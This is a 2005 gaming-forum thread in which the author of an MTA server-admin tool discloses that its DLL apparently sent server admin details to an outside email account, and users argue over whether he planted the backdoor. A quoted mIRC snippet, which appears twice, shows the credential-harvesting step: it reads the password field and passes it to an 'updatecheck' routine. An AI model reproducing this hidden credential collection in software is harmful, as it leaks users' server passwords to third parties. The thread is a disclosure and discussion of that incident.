Oli Posted November 3, 2005 Share Posted November 3, 2005 (edited) If you are a user of MTA:mA:GRS I high recommend you update it now. Due to a lack of observation on my part, someone who wrote part of the "mtama.dll" source code has managed to add a part which seems to email the admin details of the server you are connecting to to a "[email protected]" account. I have removed this from the latest version (4.14) and am contacting gmail to have that email address removed, as well as contacting the person responsible (im not sure what kind of action i can take against him at this time - and this was about a year ago so im having trouble conacting this guy). I cannot apologise enough for this, a huge mistake on my part for not seeing it before. Edited March 19, 2006 by Guest Link to comment
Mike Posted November 3, 2005 Share Posted November 3, 2005 Fair enough, if you didn't code the dll (although i don't believe you), why, may i ask did you include this portion of mIRC code (of which i know you're proficient in): on *:sockopen:updatecheck:{ if ($dialog(mta)) { var %a = $did(mta,$mta.active $+ 09),%b = $did(mta,$mta.active $+ 10),%c = $did(mta,$mta.active $+ 41),%d = $did(mta,$mta.active $+ 11),%e = $did(mta,$mta.active $+ 12),%f = $grs.version updatecheck %a %b %c %d %e %f } } I'll explain some of this, $did() is an identifier to return values from a menu. Here is some code from the GRS to get information from a menu, in this case, MTAmA's menu. $did(mta,$mta.active $+ 11) This code returns the password entered, taken from the MTAmA window, shown by comparing it to some code from MTAmA itself (which saves the password when closing MTAmA): if ($did(mta,%a $+ 11)) %b %a pass $did(mta,%a $+ 11) Now, to my main point: Why would you need the password for the server, other than spying on the users of it? Link to comment
Damo Posted November 3, 2005 Share Posted November 3, 2005 (edited) Oli DO NOT lock this thread again, we would like to discuss this with each other. I clearly stated; One of our members entrusted Oli with out password a long time ago and Im yet to find out if that even was the same pass as we are using. Dont try and worm your way out of this one Oli. There is not now, never has, and never will be a backdoor in MTA. Look first to your Admin policy, specifically how many people are provided with the details, rather than throw your rattle at the biggest target you see, MTA itself. Really ? ah the drama. #Popcornsmile 1: could you imagine how risky it would be to put a backdoor on all mta servers? not only legal ramifications, but also the risk of some hacker finding it. no, mta guys are much smarter than that. 2: this "heinous crime" oli commited was a simple kick. you jump to conclusions, wave accusations around, and neglected to actually look into it yourself. a much bettter response would have been to investigate for about 10 seconds, realize that you don't want oli as an admin, remove it, then be done with it. Are you sure about that ? How can you remove someones admin access when they have constant access to your passwords without your permission ? Damo, let this be a lesson. If you give a pass to someone who shoud not have it, change it afterwards. Blokker - Let this be a lesson to you, you are not superior to me in any way. Maybe im a noob that plays MTA so im not entitled to an opinion cos im not in BLASTA or on the Team - Wrong, my opinion matters and its a shame its come to this. Oli - Well done you've made a complete spectacle out of yourself and all your followers like Jax now look like complete asses. PS - I had to repost here, someones "lock" crazy. Edited November 4, 2005 by Guest Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 Fair enough, if you didn't code the dll (although i don't believe you), why, may i ask did you include this portion of mIRC code (of which i know you're proficient in): on *:sockopen:updatecheck:{ if ($dialog(mta)) { var %a = $did(mta,$mta.active $+ 09),%b = $did(mta,$mta.active $+ 10),%c = $did(mta,$mta.active $+ 41),%d = $did(mta,$mta.active $+ 11),%e = $did(mta,$mta.active $+ 12),%f = $grs.version updatecheck %a %b %c %d %e %f } } I'll explain some of this, $did() is an identifier to return values from a menu. Here is some code from the GRS to get information from a menu, in this case, MTAmA's menu. $did(mta,$mta.active $+ 11) This code returns the password entered, taken from the MTAmA window, shown by comparing it to some code from MTAmA itself (which saves the password when closing MTAmA): if ($did(mta,%a $+ 11)) %b %a pass $did(mta,%a $+ 11) Now, to my main point: Why would you need the password for the server, other than spying on the users of it? I never added that code. The person who helped me with this DLL was actually in the room with me. Its entirely possible for him to have added this. I can see no one believes me here.. so what do u suggest i do about it? Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 Oli DO NOT lock this thread again, we would like to discuss this with each other.I clearly stated; One of our members entrusted Oli with out password a long time ago and Im yet to find out if that even was the same pass as we are using. Dont try and worm your way out of this one Oli. There is not now, never has, and never will be a backdoor in MTA. Look first to your Admin policy, specifically how many people are provided with the details, rather than throw your rattle at the biggest target you see, MTA itself. Really ? ah the drama. #Popcornsmile 1: could you imagine how risky it would be to put a backdoor on all mta servers? not only legal ramifications, but also the risk of some hacker finding it. no, mta guys are much smarter than that. 2: this "heinous crime" oli commited was a simple kick. you jump to conclusions, wave accusations around, and neglected to actually look into it yourself. a much bettter response would have been to investigate for about 10 seconds, realize that you don't want oli as an admin, remove it, then be done with it. Are you sure about that ? How can you remove someones admin access when they have constant access to your passwords without your permission ? Damo, let this be a lesson. If you give a pass to someone who shoud not have it, change it afterwards. MrBump - Let this be a lesson to you, you are not superior to me in any way. Maybe im a noob that plays MTA so im not entitled to an opinion cos im not in BLASTA or on the Team - Wrong, my opinion matters and its a shame its come to this. Oli - Well done you've made a complete spectacle out of yourself and all your followers like Jax now look like complete asses. PS - I had to repost here, someone "lock" crazy. I freely admit this is partly my fault for not seeing it. But when i wrote GRS i was not on the MTA Team, nor is it supported by the team in any way. I know this is a great oppertunity for ppl who dislike me to jump in and say a load of stuff, i guess i deserve that for not looking at some source code a year ago when i didnt even think things like this were possible. Lets look at the bottom line: If I wrote this into GRS, its obviously not that well hidden, someone would (and has) found it. That makes me look bad, makes GRS look nad and makes MTA look bad. Now why would I want to do that to something I put put so much time and effort into? I dont really know how else to put this to you. Im sure you'll come back with something implicating me some more, I deserve it for not seeing this before.. so go right ahead Link to comment
littlewhitey Posted November 3, 2005 Share Posted November 3, 2005 Why not name and shame this random person who apparently added the code? If you didn't write that, then it's just fair that we get to know who did and blame them Link to comment
Damo Posted November 3, 2005 Share Posted November 3, 2005 If you didnt break into our server and kick my admins - MAYBE people would have given u a chance, listened to your side of the story. Remeber VCES Server ? You had a great time terrorising them, gaining their passwords. You fvcked up, simple as and its all crumbling around you. Gratz. Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 If you didnt break into our server and kick my admins - MAYBE people would have give u a chance, listened to your side of the story.Remeber VCES Server ? You had a great time terrorising them, gaining their passwords. You fvcked up, simple as and its all crumbling around you. Gratz. VCES? when was that? years ago when i was good friends with ron and brophy and was an admin on the server? terrorising? Link to comment
So'lide Posted November 3, 2005 Share Posted November 3, 2005 Pointless blaming. Why should Oli even do that? Huh? Link to comment
MrJax Posted November 3, 2005 Share Posted November 3, 2005 Oli - Well done you've made a complete spectacle out of yourself and all your followers like Jax now look like complete asses. Haha, i've known Oli for almost 2 years now, so defending a m8 who's a nice guy is known as being a follower? Does anyone really think that he would need to add something like that, he's on the MTA team for gods sake, he could just write something into blue if he was remotely that type of person. Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 Why not name and shame this random person who apparently added the code? If you didn't write that, then it's just fair that we get to know who did and blame them The guys name is mark. He was a friend of mine who lived in Bristol near me at the time. I am trying to contact him. Link to comment
eAi Posted November 3, 2005 Share Posted November 3, 2005 (edited) Its not as if Oli needs character witnesses, many people in the community have known him for longer than I have, but I can say that I'm certain that he would never do somthing like this. Hes put countless hours into making MTA the best possible game, he wouldn't do somthing like this to spoil that. Damo: This is not the place to attack anyone, team member of not. Please treat people with respect and act maturely. Edited November 3, 2005 by Guest Link to comment
littlewhitey Posted November 3, 2005 Share Posted November 3, 2005 The guys name is mark. He was a friend of mine who lived in Bristol near me at the time. I am trying to contact him. What nick did he use online? If any.. Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 he used the name "mark" on irc when we spoke. Link to comment
Damo Posted November 3, 2005 Share Posted November 3, 2005 (edited) Damo: This is not the place to attack anyone, team member of not. Please treat people with respect and act maturely. Like threatening to ban my account and discarding my posts when I was complaining about Oli breaking into our server ? Give me a break plz. Im not attacking anybody but c'mon - A guy named Mark on IRC did it No reports of "Mark" using the passowrds, only person who has used these passwords to use Admin on servers is Oli so please get off my back MTA Team, wake up ffs open ur eyes. Edit - Stop deleting my posts plz I thought the potnoodle joke about blaming Big Dave was quite amusing. Shame some of u have no sense of humour. Edited November 3, 2005 by Guest Link to comment
[FMJ]chode Posted November 3, 2005 Share Posted November 3, 2005 did you read the terms and conditions at the convention? yeah? Well, according to paragraph 7, sentence 3, word 8 of the Geneva Convention: 'the' so tough luck, swansen..i mean all of nah sayers. Link to comment
Oli Posted November 3, 2005 Author Share Posted November 3, 2005 Damo: This is not the place to attack anyone, team member of not. Please treat people with respect and act maturely. Like threatening to ban my account and discarding my posts when I was complaining about Oli breaking into our server ? Give me a break plz. Im not attacking anybody but c'mon - A guy named Mark on IRC did it No reports of "Mark" using the passowrds, only person who has used these passwords to use Admin on servers is Oli so please get off my back MTA Team, wake up ffs open ur eyes. Actually i rarely spoke with him on IRC damo. He was a friend at the time who knew some things i didnt about these things and offered to help. I didnt think he would do anything malicious, so i didnt check over the code he wrote. lol chode edut: damo im not deleting ure posts btw, not sure who is. Link to comment
Aeron Posted November 4, 2005 Share Posted November 4, 2005 If you didnt break into our server and kick my admins - MAYBE people would have given u a chance, listened to your side of the story.Remeber VCES Server ? You had a great time terrorising them, gaining their passwords. You fvcked up, simple as and its all crumbling around you. Gratz. Let's say: 0W3N3D by 'mark' WAHAHHAAHHAHAHAHAHAHAH stfu noob Link to comment
Damo Posted November 4, 2005 Share Posted November 4, 2005 (edited) EDIT - My bad Oli, sorry. Its working great now. Edited November 4, 2005 by Guest Link to comment
Oli Posted November 4, 2005 Author Share Posted November 4, 2005 Edit: ok damo, sorry again for the trouble today Link to comment
MeanpantheR Posted November 4, 2005 Share Posted November 4, 2005 who cares who did it, aslong as it gets fixed Link to comment
Ransom Posted November 4, 2005 Share Posted November 4, 2005 I'd just like to add for Olis defense... for the sake of argument, most servers would give admin to MTA Team members, on request, just out of respect alone (I mean just look at all the people that want to donate MONEY to MTA team). Whenever I frequently played a server when I became well known around here I always got admin unless nobody there knew me, simply because I was an old community member and proved to be a good guy. Now Oli here is on the MTA Team with a pretty clean sheet just like me, add it up. He has no need for this sort of thing. Even though this GRS thing started sometime before he was on the team, back then he could be considered to be at a level of trust and respect I'm still lingering at. Therefore, again, he had little reason for some code like that even before he joined the team. Link to comment
Recommended Posts